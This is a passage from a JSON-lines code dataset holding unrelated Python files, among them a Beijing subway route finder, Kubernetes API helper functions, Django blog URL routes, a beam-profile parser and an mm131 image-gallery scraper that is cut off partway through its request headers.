action='store_true')\nargs = parser.parse_args()\n\nDATASET_DIR='/raid/datasets/MTN_data'\n# DATASET_DIR = '/raid/datasets/New_Sejong_RCV_dataset/RGBTDv4/'\n\ntxt_list = [f for f in listdir(join(DATASET_DIR,'txt')) if isfile(join(join(DATASET_DIR,'txt'), f))]\n\n\nif args.train:\n save_path = join('datas','train')\n txt_path = [p for p in txt_list if p=='train.txt']\nelse:\n save_path = join('datas','test')\n txt_path = [p for p in txt_list if p=='test.txt']\n\nif os.path.isdir(join(save_path,'THER')) is False:\n print('Create path: {0}'.format(join(save_path,'THER')))\n os.makedirs(join(save_path,'THER'))\n\nif os.path.isdir(join(save_path,'RGB')) is False:\n print('Create path: {0}'.format(join(save_path,'RGB')))\n os.makedirs(join(save_path,'RGB'))\n\nf = open(join(join(DATASET_DIR,'txt'), txt_path[0]), mode='rt')\n\nfor i,line in enumerate(tqdm(f)):\n# #potenit\n# img_list = line.split('/')\n# if img_list[-1][-1] == '\\n':\n# ther = join(img_list[0],img_list[1],'Ther',img_list[-1][:-1])\n# rgb = join(img_list[0],img_list[1],'RGB',img_list[-1][:-1])\n# else:\n# ther = join(img_list[0],img_list[1],'Ther',img_list[-1])\n# rgb = join(img_list[0],img_list[1],'RGB',img_list[-1])\n \n # MTN\n img_list = line.split(' ')\n rgb = img_list[0]\n ther = img_list[-1][:-1]\n\n call(['cp','-p',join(DATASET_DIR,ther),join(save_path,'THER')])\n call(['cp','-p',join(DATASET_DIR,rgb), join(save_path,'RGB')])\n","sub_path":"Pseudo-RGB/sum_image.py","file_name":"sum_image.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"218802060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport time\nimport collections\n\n\nline1 = [\n '苹果园', '古城路', '八角游乐园', '八宝山', '玉泉路', '五棵松',\n '万寿路', '公主坟', '军事博物馆', '木樨地', '南礼士路', '复兴门',\n '西单', '天安门西', '天安门东', '王府井', '东单', '建国门', '永安里',\n '国贸', '大望路', '四惠', '四惠东'\n]\n\nline2 = [\n '西直门', '车公庄', '阜成门', '复兴门', '长椿街', '宣武门', '和平门',\n '前门', '崇文门', '北京站', '建国门', '朝阳门', '东四十条', '东直门',\n '雍和宫', '安定门', '鼓楼大街', '积水潭'\n]\n\nline4 = [\n '天宫院', '生物医药基地', '义和庄', '黄村火车站', '黄村西大街',\n '清源路', '枣园', '高米店南', '高米店北', '西红门', '新宫',\n '公益西桥', '角门西', '马家堡', '北京南站', '陶然亭', '菜市口',\n '宣武门', '西单', '灵境胡同', '西四', '平安里', '新街口', '西直门',\n '动物园', '国家图书馆', '魏公村', '人民大学', '海淀黄庄', '中关村',\n '北京大学东门', '圆明园', '西苑', '北宫门', '安河桥北'\n]\n\nline5 = [\n '宋家庄', '刘家窑', '蒲黄榆', '天坛东门', '磁器口', '崇文门', '东单',\n '灯市口', '东四', '张自忠路', '北新桥', '雍和宫', '和平里北街', '和平西桥',\n '惠新西街南口', '惠新西街北口', '大屯桥东', '北苑路北', '立水桥南', '立水桥',\n '天通苑南', '天通苑', '天通苑北'\n]\n\nline6 = [\n '海淀五路居', '慈寿寺', '白石桥南', '车公庄西', '车公庄', '平安里',\n '北海北', '南锣鼓巷', '东四', '朝阳门', '东大桥', '呼家楼', '金台路',\n '十里堡', '青年路', '褡裢坡', '黄渠', '常营', '草房', '物资学院路',\n '通州北关', '通运门', '北运河西', '北运河东', '郝家府', '东夏园', '潞城'\n]\n\nline8 = [\n '朱辛庄', '育知路', '平西府', '回龙观东大街', '霍营', '育新', '西小口',\n '永泰庄', '林萃桥', '森林公园南门', '奥林匹克公园', '奥体中心', '北土城',\n '安华桥', '鼓楼大街', '什刹海', '南锣鼓巷'\n]\n\nline9 = [\n '国家图书馆', '白石桥南', '白堆子', '军事博物馆', '北京西站', '六里桥东',\n '六里桥', '七里庄', '丰台东大街', '丰台南路', '科怡路', '丰台科技园', '郭公庄'\n]\n\nline10 = [\n '劲松', '双井', '国贸', '金台夕照', '呼家楼', '团结湖', '农业展览馆',\n '亮马桥', '三元桥', '太阳宫', '芍药居', '惠新西街南口', '安贞门', '北土城',\n '健德门', '牡丹园', '西土城', '知春路', '知春里', '海淀黄庄', '苏州街',\n '巴沟', '火器营', '长春桥', '车道沟', '慈寿寺', '西钓鱼台', '公主坟', '莲花桥',\n '六里桥', '西局', '泥洼', '丰台站', '首经贸', '纪家庙', '草桥', '角门西',\n '角门东', '大红门', '石榴庄', '宋家庄', '成寿寺', '分钟寺', '十里河', '潘家园'\n]\n\nline13 = [\n '西直门', '大钟寺', '知春路', '五道口', '上地', '西二旗', '龙泽', '回龙观',\n '霍营', '立水桥', '北苑', '望京西', '芍药居', '光熙门', '柳芳', 
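The split-file parsing above takes `split(' ')[0]` for the RGB path and `split(' ')[-1][:-1]` for the thermal path, where `[:-1]` drops the trailing newline (and would eat a real character on a final line without one). A sketch with a made-up sample line, showing that `rstrip` gives the same result more safely:

line = 'set00/RGB/img_000.png set00/Ther/img_000.png\n'   # made-up sample line

rgb, ther = line.split(' ')[0], line.split(' ')[-1][:-1]   # the script's slicing
assert (rgb, ther) == tuple(line.rstrip('\n').split(' '))  # rstrip avoids the [:-1]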
'东直门'\n]\n\nline14 = ['张郭庄', '园博园', '大瓦窑', '郭庄子', '打井', '七里庄', '西局']\n\nline15 = [\n    '俸伯', '顺义', '石门', '南法信', '后沙峪', '花梨坎', '国展',\n    '孙河', '马泉营', '崔各庄', '望京', '望京西'\n]\n\n\nSegment = collections.namedtuple('Segment', ['start', 'end'])\n\n\nclass Edge(Segment):\n    def __unicode__(self):\n        return self.start + ' --> ' + self.end\n\n\n# class Edge(object):\n#     __slots__ = ['start', 'end']\n#\n#     def __init__(self, start, end):\n#         self.start = start\n#         self.end = end\n#\n#     def __unicode__(self):\n#         return self.start + ' --> ' + self.end\n\n\nclass Path(list):\n    def stations(self):\n        end = self[-1].end\n        return [e.start for e in self] + [end]\n\n    def __unicode__(self):\n        return reduce(lambda x, y: x + ' --> ' + y, self.stations())\n\n\nclass Graph(object):\n    lines = {\n        'line1': (line1, False),\n        'line2': (line2, True),\n        'line4': (line4, False),\n        'line10': (line10, True),\n        'line13': (line13, False),\n    }\n\n    def __init__(self):\n        self._all_edges = self._make_graph()\n\n        self.stations = set()\n        for e in self._all_edges:\n            self.stations.add(e.start)\n\n        self._transfer_stations = set()\n        for s in self.stations:\n            if len([e for e in self._all_edges if e.start == s]) > 2:\n                self._transfer_stations.add(s)\n\n    @staticmethod\n    def gen_edges(line, circle=False):\n        edges = []\n        z = [iter(line[i:]) for i in range(2)]\n        for ab in zip(*z):\n            edges.append(Edge(*ab))\n        if circle:\n            edges.append(Edge(line[-1], line[0]))\n        return edges\n\n    def _make_graph(self):\n        _all_edges = set()\n        for line, circle in self.lines.values():\n            _all_edges.update(set(self.gen_edges(line, circle=circle)))\n            _all_edges.update(set(self.gen_edges(line[::-1], circle=circle)))\n        return _all_edges\n\n    def _get_edges_by_station(self, station):\n        \"\"\"Return all edges that start at the given station.\"\"\"\n        return [e for e in self._all_edges if e.start == station]\n\n    def get_paths(self, src, dst):\n        if src == dst:\n            return unicode(Edge(src, dst))\n\n        paths = []\n        for e in self._get_edges_by_station(src):\n            paths.append(Path([e]))\n\n        while True:\n            history = set()\n            length = None\n\n            temp_path_list = []\n            for path in paths:\n                # once some path has reached dst, any longer candidate can be dropped\n                if length is not None and len(path) > length:\n                    temp_path_list.append(path + [''])\n                    continue\n\n                if not path[-1]:\n                    temp_path_list.append(path)\n                    continue\n\n                if path[-1].end == dst:\n                    length = len(path)\n                    temp_path_list.append(path)\n                    continue\n\n                temp_paths = []\n                for e in self._all_edges:\n                    if e not in history:\n                        if path[-1].end == e.start and path[-1].start != e.end:\n                            temp_paths.append(e)\n                            history.add(e)\n\n                if not temp_paths:\n                    temp_path_list.append(path + [''])\n                    continue\n\n                for t in temp_paths:\n                    temp_path_list.append(path + [t])\n\n            paths = temp_path_list\n\n            flags = []\n            for p in paths:\n                if p[-1]:\n                    flags.append(p[-1].end == dst)\n                else:\n                    flags.append(True)\n\n            if all(flags):\n                return paths\n\n\nif __name__ == \"__main__\":\n    graph = Graph()\n    transfer_stations = graph._transfer_stations\n\n    # src = '八宝山'\n    # dst = '知春路'\n    #\n    # for ps in graph.get_paths(src, dst):\n    #     if ps[-1] and ps[-1].end == dst:\n    #         print '**************************************'\n    #         for p in ps:\n    #             print unicode(p)\n","sub_path":"python/others/subway.py","file_name":"subway.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} 
+{"seq_id":"326050957","text":"#!/usr/bin/python3\n\nimport base64\nimport random\nimport string\nimport os\nimport sys\nimport yaml\nimport io\nimport time\nimport requests\n\nfirstTimeAdding = True\n\n# some random high value port, can change using setPort command\nK8S_PORT = 12321\n\n'''\nopen template file to fill in values later\n'''\nwith open(\"template.yaml\", \"r\") as stream:\n z = yaml.safe_load(stream)\n\n\ndef changeApiVersion(api):\n z['apiVersion'] = api\n\n\ndef changeName(name):\n if (type(name) != str):\n if (type(name) == list):\n name = name[0]\n z['metadata']['name'] = str(name)\n\n\ndef updateReplicas(n):\n z['spec']['replicas'] = int(n)\n\n\ndef updateSelector(selector):\n z['spec']['selector']['matchlabels']['app'] = selector\n\n\ndef addContainer(arg):\n c = z['spec']['template']['spec']['containers']\n toAppend = c[0].copy()\n try:\n command = arg[2:]\n image = arg[1]\n name = arg[0]\n toAppend['name'] = name\n toAppend['image'] = image\n toAppend['command'] = list(command)\n c.append(toAppend)\n except Exception as e:\n print(e)\n print(\"syntax - addContainer \")\n print(\"eg - addContainer container1 ubuntu ping 1.1.1.1\")\n raise(e)\n\n global firstTimeAdding\n if (firstTimeAdding):\n deleteContainer(0)\n firstTimeAdding = False\n\n\ndef getContainers():\n return (z['spec']['template']['spec']['containers'])\n\n\ndef getName():\n return z['metadata']['name']\n\n\ndef getReplicas():\n return z['spec']['replicas']\n\n\ndef getApiVersion():\n return z['apiVersion']\n\n\ndef deleteContainer(index):\n c = z['spec']['template']['spec']['containers']\n try:\n del c[int(index)]\n except Exception as e:\n raise(e)\n\n\ndef getSelector():\n return z['spec']['selector']['matchlabels']['app']\n\n\ndef writeToFile(filename):\n\n with io.open(filename, \"w\") as f:\n yaml.dump(z, f, default_flow_style=False,\n explicit_start=True,\n allow_unicode=True, sort_keys=False)\n\n f.close()\n\n\ndef openProxy():\n\n try:\n pid = os.fork()\n except Exception as e:\n raise (e)\n\n if (pid == 0):\n command = \"kubectl proxy -p {}\".format(K8S_PORT)\n params = command.split(\" \")\n\n try:\n os.execvp(params[0], params)\n except Exception as e:\n raise e\n\n else:\n\n time.sleep(10)\n # let child sleep in background\n\n\ndef setPort(p):\n\n global K8S_PORT\n K8S_PORT = int(p)\n\n\ndef pushYamlFile(filename):\n try:\n\n u = \"http://localhost:{}/\".format(K8S_PORT) +\\\n \"apis/apps/v1/namespaces/default/deployments\"\n\n print(u)\n with open(filename, \"r\") as stream:\n z = yaml.safe_load(stream)\n\n resp = requests.post(u, json=z)\n if resp.status_code != 201:\n # This means something went wrong.\n raise Exception(\"Error with code \" +\n str(resp.status_code))\n else:\n print(\"Success with status code 201\")\n\n except Exception as e:\n print(e)\n\n\ndef runFile(filename):\n\n try:\n pid = os.fork()\n except Exception as e:\n print(e)\n raise(e)\n\n if (pid == 0): # run in child process\n\n # push it to server\n pushYamlFile(filename)\n\n else:\n\n # wait for child process to terminate\n os.waitpid(pid, 0)\n\n\ndef parseStatusJson(dct):\n\n for pods in dct['items']:\n\n name = pods[\"metadata\"][\"name\"]\n\n workers = pods[\"spec\"][\"containers\"]\n\n print(\"Pod name: {}\".format(name))\n\n for w in workers:\n print(\"Worker Name:{}\".format(w[\"name\"]))\n print(\"Worker Image:{}\".format(w[\"image\"]))\n print(\"Worker Job:{}\\n\".format(w[\"command\"]))\n\n print(\"==================\")\n\n\ndef checkStatus():\n try:\n pid = os.fork()\n except Exception as e:\n raise (e)\n\n 
if (pid == 0):\n\n        url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n            \"api/v1/namespaces/default/pods\"\n\n        resp = requests.get(url)\n        if resp.status_code != 200:\n            # This means something went wrong.\n            raise Exception(\"Error with code \" +\n                            str(resp.status_code))\n\n        else:\n            print(\"Success with status code 200, \\\n                parsing response...\")\n\n            parseStatusJson(resp.json())\n\n    else:\n        os.waitpid(pid, 0)\n\n\ndef deletePod(podName):\n\n    url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n        \"api/v1/namespaces/default/pods/{}\".format(podName)\n\n    try:\n\n        resp = requests.delete(url)\n\n        if (resp.status_code not in (200, 202)):\n            raise Exception(\"Error with code \" +\n                            str(resp.status_code))\n        else:\n            print(\"Successfully deleted pod {}\".format(podName))\n    except Exception as e:\n        raise e\n\ndef getWorkerNameByCommand(pod, command):\n\n    url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n        \"api/v1/namespaces/default/pods\"\n\n    resp = requests.get(url)\n    if resp.status_code != 200:\n        # This means something went wrong.\n        raise Exception(\"Error with code \" +\n                        str(resp.status_code))\n\n    else:\n        print(\"Success with status code 200, \\\n            parsing response...\")\n\n    dct = resp.json()\n\n    foundPod = False\n\n    for pods in dct['items']:\n\n        name = pods[\"metadata\"][\"name\"]\n        if (name == pod):\n            foundPod = pods\n            break\n\n    if (foundPod):\n        workers = foundPod[\"spec\"][\"containers\"]\n\n        myCommand = command\n        for w in workers:\n\n            workerCommand = w['command']\n            if (workerCommand == myCommand):\n                return w\n\n        raise Exception(\"Command not found in pod\")\n\n    else:\n        raise Exception(\"Pod not found\")\n\ndef getLogsByCommand(param):\n\n    pod = param[0]\n    command = param[1:]\n\n    worker = getWorkerNameByCommand(pod, command)\n    workerName = worker[\"name\"]\n\n    return getLogs([pod, workerName])\n\ndef getLogs(params):\n\n    pod = params[0]\n\n    try:\n        container = params[1]\n    except Exception as e:\n        container = False\n\n    url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n        \"api/v1/namespaces/default/pods/\" + \\\n        \"{}/log\".format(pod)\n\n    if (container):\n        param = {'container': container}\n    else:\n        param = None\n\n    try:\n        if (param):\n            resp = requests.get(url, params = param)\n        else:\n            resp = requests.get(url)\n    except Exception as e:\n        raise(e)\n\n    if (resp.status_code == 204):\n        return \"No logs for pod: {}, container: {}\".\\\n            format(pod, container)\n\n    elif (resp.status_code != 200):\n        raise Exception(\"Error code {} when querying api\\n\"\\\n                        .format(resp.status_code) +\\\n                        \"Error message: {}\"\\\n                        .format(resp.json()['message']))\n\n    return resp.text\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"211372287","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\n\nfrom luckycommon.model.coupon import GroupCoupon\nfrom luckycommon.social.model.share import *\nfrom luckycommon.utils.decorator import sql_wrapper\nfrom luckycommon.utils.tz import now_ts\n\n_LOGGER = logging.getLogger('lucky')\n\n\n@sql_wrapper\ndef submit(user_id, date_str, share_type):\n    item = SocialShare.query.filter(SocialShare.user_id == user_id)\\\n        .filter(SocialShare.date == date_str)\\\n        .filter(SocialShare.share_type == share_type)\\\n        .with_lockmode('update').first()\n    if not item:\n        item = SocialShare()\n        item.user_id = user_id\n        item.date = date_str\n        item.share_type = share_type\n        item.share_times = 0\n        if share_type == 
SHARE_TYPE.DETAIL:\n # create coupon\n coupon = GroupCoupon()\n coupon.user_id = user_id\n coupon.title = ''\n coupon.total_count = SHARE_COUPON_INTERNAL_COUNT\n coupon.left_count = SHARE_COUPON_INTERNAL_COUNT\n coupon.expire_ts = now_ts() + SHARE_COUPON_EXPIRE_TS\n coupon.campaign_id = 'social_share'\n coupon.save(auto_commit=False)\n orm.session.flush()\n item.extend = json.dumps({'coupon': coupon.id})\n item.share_times += 1\n item.save(auto_commit=False)\n orm.session.commit()\n return item\n","sub_path":"luckycommon/social/db/share.py","file_name":"share.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"74745428","text":"v_lis = list(map(int, input().split()))\nm = [500, 100, 50, 10]\nd = {}\nfor i, k in enumerate(m):\n d[k] = v_lis[i]\nfor i in range(int(input())):\n input_line = input().split()\n b = int(input_line[0])\n x_lis = list(map(int, input_line[1:]))\n s = sum([x * x_lis[i] for i, x in enumerate(m)])\n r = s - b\n q_lis = []\n for i, k in enumerate(sorted(d, reverse=True)):\n q = r // k\n p = d[k] - q\n if p >= 0:\n q_lis.append(q)\n r -= (k * q)\n else:\n if i != 2:\n print('impossible')\n break\n else:\n q_lis.append(0)\n else:\n if r == 0:\n print(' '.join(map(str, q_lis)))\n for i, k in enumerate(m):\n d[k] -= q_lis[i]\n d[k] += x_lis[i]\n else:\n print('impossible')\n","sub_path":"takumiy/B/B026.py","file_name":"B026.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"555501259","text":"import matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os, pickle\r\nimport numpy as np\r\nopj = os.path.join\r\n\r\ncw = [np.array([78., 121., 165.])/255.,\r\nnp.array([241., 143., 59.])/255.,\r\nnp.array([224., 88., 91.])/255.,\r\nnp.array([119., 183., 178.])/255.,\r\nnp.array([90., 161., 85.])/255.,\r\nnp.array([237., 201., 88.])/255.,\r\nnp.array([175., 122., 160.])/255.,\r\nnp.array([254., 158., 168.])/255.,\r\nnp.array([156., 117., 97.])/255.,\r\nnp.array([186., 176., 172.])/255.]\r\n\r\ndef det_name(idx, nus):\r\n\r\n det = 'det{:04d}_{:d}'.format(int(idx), int(np.mean(nus)))\r\n\r\n return det\r\n\r\ndef degsq2srad(deg2):\r\n '''\r\n https://en.wikipedia.org/wiki/Square_degree\r\n '''\r\n\r\n return deg2/(41252.9612494/4/np.pi)\r\n\r\ndef get_da(cr, numel, mult=1):\r\n\r\n return ((float(cr[2])-float(cr[0]))/(mult*float(numel[0])))**2\r\n\r\ndef get_mesh(cr, numel, mult=1):\r\n\r\n xx, yy = np.meshgrid(np.linspace(cr[0], cr[2], mult*numel[0]),\r\n np.linspace(cr[1], cr[3], mult*numel[1]))\r\n\r\n dA = get_da(cr, numel, mult=1)\r\n\r\n return xx, yy, dA\r\n\r\n\r\ndef bsa(arr, dA, maxval=None, normalize=True):\r\n\r\n if maxval is None and normalize:\r\n maxval = np.max(arr.flatten())\r\n\r\n return dA * np.sum(arr/maxval)\r\n\r\n return dA * np.sum(arr)\r\n\r\ndef parse_data(nus=[90], run_str1='test1', run_str2='test1_wide',\r\n rdir='pkl/', idir='img_profiles/'):\r\n\r\n nu = np.mean(nus)\r\n\r\n i = 64\r\n det = det_name(i, nus)\r\n det1 = det + '_{}'.format(run_str1)\r\n det2 = det + '_{}'.format(run_str2)\r\n\r\n fname1 = det1 + '.pkl'\r\n fname2 = det2 + '.pkl'\r\n results1 = pickle.load(open(rdir+fname1, 'rb'), encoding = 'bytes')\r\n prop1 = pickle.load(open(rdir+fname1.replace('.pkl','_prop.pkl'), 'rb'), encoding = 'bytes')\r\n results2 = pickle.load(open(rdir+fname2, 'rb'), encoding = 'bytes')\r\n prop2 = 
pickle.load(open(rdir+fname2.replace('.pkl','_prop.pkl'), 'rb'), encoding = 'bytes')\r\n\r\n arr11 = (np.abs(results1[b'e_cx'])**2).astype('float32')\r\n arr12 = (np.abs(results2[b'e_cx'])**2).astype('float32')\r\n\r\n print(results1.keys())\r\n print(prop1.keys())\r\n \r\n #print(results1[b'co'])\r\n\r\n bsa1 = degsq2srad(bsa(arr11, get_da(results1[b'cr'], results1[b'numel'])))\r\n bsa2 = degsq2srad(bsa(arr12, get_da(results2[b'cr'], results2[b'numel'])))\r\n \r\n forfitting = {}\r\n forfitting['data'] = arr11\r\n forfitting['mesh'] = get_mesh(results1[b'cr'], results1[b'numel'])\r\n pickle.dump(forfitting, open('fitting_'+fname1, 'wb'))\r\n\r\n foraamir = {}\r\n foraamir['data'] = arr11\r\n len_mesh = abs(forfitting['mesh'][0][0][len(forfitting['mesh'][0][0])-1]-forfitting['mesh'][0][0][0])\r\n pitch_mesh = abs(forfitting['mesh'][0][0][0]-forfitting['mesh'][0][0][1])\r\n foraamir['size'] = [[round(len_mesh, 2), round(pitch_mesh, 3)], [len(forfitting['data'][0]), 1.0]]\r\n print(len(forfitting['data'][0]))\r\n pickle.dump(foraamir, open('aamir_'+fname1, 'wb'))\r\n \r\n \"\"\"\r\n fg1 = 4*np.pi/bsa1\r\n fg2 = 4*np.pi/bsa2\r\n\r\n print(10*np.log10(fg1))\r\n print(10*np.log10(fg2))\r\n print(fname1)\r\n print(fname2)\r\n\r\n pco1 = prop1['pow_co']\r\n pco2 = prop2['pow_co']\r\n pcx1 = prop1['pow_cx']\r\n pcx2 = prop2['pow_cx']\r\n\r\n lstr1 = 'Det #{}'.format(i+1)\r\n lstr2 = 'Det #{} w/window scattering'.format(i+1)\r\n\r\n theta = np.linspace(prop1['theta_min'], prop1['theta_max'], prop1['ntheta'])\r\n plt.plot(theta, 10*np.log10(fg1*pco1[1]/np.max(pco1[1])), label=lstr1, color=cw[0])\r\n plt.plot(theta, 10*np.log10(fg2*pco2[1]/np.max(pco2[1])), label=lstr2, color=cw[1], ls='--')\r\n\r\n plt.legend(ncol=1, frameon=False)\r\n plt.xlabel('Theta [deg]')\r\n plt.ylabel('Power [dBi]')\r\n\r\n plt.ylim([-50, 50])\r\n plt.title('Co-polar beam profiles at {:d} GHz'.format(int(nu)))\r\n plt.savefig(opj(idir, '{}_co'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.xlim([-20, 20])\r\n plt.savefig(opj(idir, '{}_co_zoom1'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.xlim([-20, 20])\r\n plt.savefig(opj(idir, '{}_co_zoom1'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.close()\r\n \"\"\"\r\n\r\ndef main():\r\n\r\n parse_data()\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n","sub_path":"py3_parse_beams.py","file_name":"py3_parse_beams.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"591800027","text":"from django.urls import path,include\nfrom . 
import views\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib import admin\n\nurlpatterns = [\n    # 127.0.0.1:8000 --> local\n    # mydjangosite.com --> online\n    path('', views.postsList, name='postsList'),\n    # 127.0.0.1:8000/post/2 --> local\n    # mydjangosite.com/post/2 --> online\n    path('post/<int:pk>/', views.postsDetail, name='postsDetail'),\n    # 127.0.0.1:8000/post/new --> local\n    # mydjangosite.com/post/new --> online\n    path('post/new/', views.postNew, name='postNew'),\n    # 127.0.0.1:8000/post/1/edit --> local\n    # mydjangosite.com/post/1/edit --> online\n    path('post/<int:pk>/edit/', views.postEdit, name='postEdit'),\n    # 127.0.0.1:8000/post/1/delete --> local\n    # mydjangosite.com/post/1/delete --> online\n    path('post/<int:pk>/delete/', views.postDelete, name='postDelete'),\n    # 127.0.0.1:8000/drafts --> local\n    # mydjangosite.com/drafts --> online\n    path('drafts/', views.postDraftlist, name='postDraftlist'),\n    # 127.0.0.1:8000/post/1/publish --> local\n    # mydjangosite.com/post/1/publish --> online\n    path('post/<int:pk>/publish/', views.postPublish, name='postPublish'),\n    # 127.0.0.1:8000/accounts/login --> local\n    # mydjangosite.com/accounts/login --> online\n    path('accounts/', include('django.contrib.auth.urls')),\n    # 127.0.0.1:8000/post/1/comment --> local\n    # mydjangosite.com/post/1/comment --> online\n    path('post/<int:pk>/comment/', views.add_comment_to_post, name='add_comment_to_post'),\n    # 127.0.0.1:8000/comment/1/remove --> local\n    # mydjangosite.com/comment/1/remove --> online\n    path('comment/<int:pk>/remove/', views.comment_remove, name='comment_remove'),\n    # 127.0.0.1:8000/comment/1/approve --> local\n    # mydjangosite.com/comment/1/approve --> online\n    path('comment/<int:pk>/approve/', views.comment_approve, name='comment_approve'),\n    # 127.0.0.1:8000/signup --> local\n    # mydjangosite.com/signup --> online\n    path('signup/', views.signup, name='signup'),\n    # 127.0.0.1:8000/logout --> local\n    # mydjangosite.com/logout --> online\n    path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n    # path(r'^accounts/login/$', auth_views.LoginView.as_view(template_name='registration/login.html')),\n    #url('^change-password/$', auth_views.PasswordChangeView.as_view()),\n    #^login/$ [name='login']\n    #^password_change/$ [name='password_change']\n]\n\n\n#login( request, template_name=`registration/login.html`, redirect_field_name='next', authentication_form=AuthenticationForm, current_app=None, extra_context=None, redirect_authenticated_user=False\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"362487327","text":"#coding:utf8\n# Recursively list a directory tree\nimport os\ndef f(path):\n    w1=os.listdir(path)\n    allfile=[]\n    for filename in w1:\n        filepath=os.path.join(path,filename)\n        if os.path.isdir(filepath):\n            allfile.extend(f(filepath))\n        allfile.append(filepath)\n    return allfile\n\ns=open('./1.txt','r+')\npath='./'\nif __name__ == \"__main__\":\n    w=f(path)\nfor i in w:\n    s.write(i)\ns.close()\n","sub_path":"os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483532389","text":"#!/usr/bin/env python3\n# coding=utf-8\n\"\"\"\npip3 install requests\nScrape images from mm131\n\"\"\"\nimport os\nimport re\nimport ssl\nimport time\nimport threading\nimport random\nimport requests\nimport sys\n\nfrom spider_utils import getDataByUrl, getHeaders, getUserAgent\n\nhost_name = \"http://www.mm131.com/\"\n# set of categories to scrape\n# key_names = 
[\"xinggan\", \"qingchun\", \"xiaohua\", \"chemo\", \"qipao\", \"mingxing\"]\n# key_names = [\"chemo\", \"qipao\", \"mingxing\"]\nkey_names = [\"xinggan\"]\n# 图片保存跟路径\nbas_path = \"/Volumes/work/image/mm131/\"\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef getDataByKey(keynames, page_size):\n \"\"\"\n 批量下载频道下图片\n :param keynames: 频道大类名称\n :param page_size: 下载列表页页数,从1开始\n :return:\n \"\"\"\n for keyname in keynames:\n for index in range(0, page_size): # 每个大的类别获取指定页的套图,每页现在是20组,总共每个大的类别获取60组\n url = host_name + keyname + \"/\"\n if index != 0:\n if keyname == \"xinggan\":\n url += \"list_6_\" + str(index + 1) + \".html\"\n elif keyname == \"qingchun\":\n url += \"list_1_\" + str(index + 1) + \".html\"\n elif keyname == \"xiaohua\":\n url += \"list_2_\" + str(index + 1) + \".html\"\n elif keyname == \"chemo\":\n url += \"list_3_\" + str(index + 1) + \".html\"\n elif keyname == \"qipao\":\n url += \"list_4_\" + str(index + 1) + \".html\"\n elif keyname == \"mingxing\":\n url += \"list_5_\" + str(index + 1) + \".html\"\n\n # print(\"url-->\" + url)\n data = getDataByUrl(url)\n pat_link = '
    \"(.*?)\"\\s{0,}width=\"'\n\" + link)\n data = getDataByUrl(link, encoding='gb2312')\n pat_img = ''\n img_url = re.compile(pat_img, re.S).findall(data)\n saveImgToLocal(img_url[0], keyName, title, pageIndex)\n # print(imgUrl)\n\n\n# 获取每个组的套图链接地址\ndef getDataByGroup(link, pageCounts, keyName, title):\n for pageCount in pageCounts:\n # pageCount代表每个套图中有多少张高清图片\n # print(\"每套套图的高清图片数量:\" + pageCount)\n threads = []\n for i in range(int(pageCount)):\n if i != 0:\n # 如果不是首页的话,就开始替换字符串~\n new_link = link.replace(\".html\", \"_\" + str(i + 1) + \".html\")\n # getImgUrlByLink(new_link, keyName, title, i)\n t = threading.Thread(target=getImgUrlByLink, args=(new_link, keyName, title, i))\n else:\n # getImgUrlByLink(link, keyName, title, i)\n t = threading.Thread(target=getImgUrlByLink, args=(link, keyName, title, i))\n threads.append(t)\n pass\n thread_count = 10\n while threads:\n threads_part = threads[:thread_count]\n for t in threads_part:\n t.start()\n for t in threads_part:\n t.join()\n threads = threads[thread_count:]\n # 随机暂停1到3秒\n time.sleep(round(random.uniform(1, 3), 2))\n\n\nlock = threading.Lock()\n\n\ndef saveImgToLocal(imgUrl, keyName, title, pageIndex):\n \"\"\"\n 下载图片到本地,改用了requests库\n :param imgUrl:图片真实url\n :param keyName: 大的类别关键字,xinggan,qingchun,xiaohua\n :param title: 每个套图的标题\n :param pageIndex: 每个套图中高保真图所在的索引号\n :return:\n \"\"\"\n path = bas_path + keyName + \"/\" + title + \"/\"\n if not os.path.exists(path):\n lock.acquire()\n if not os.path.exists(path):\n os.makedirs(path)\n lock.release()\n path += title + str(pageIndex + 1) + '.jpg'\n if not os.path.exists(path):\n try:\n headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Cookie': 'UM_distinctid=15fa02251e679e-05c01fdf7965e7-5848211c-144000-15fa02251e7801; bdshare_firstime=1510220189357; CNZZDATA1263415983=1653134122-1510216223-null%7C1510216223; 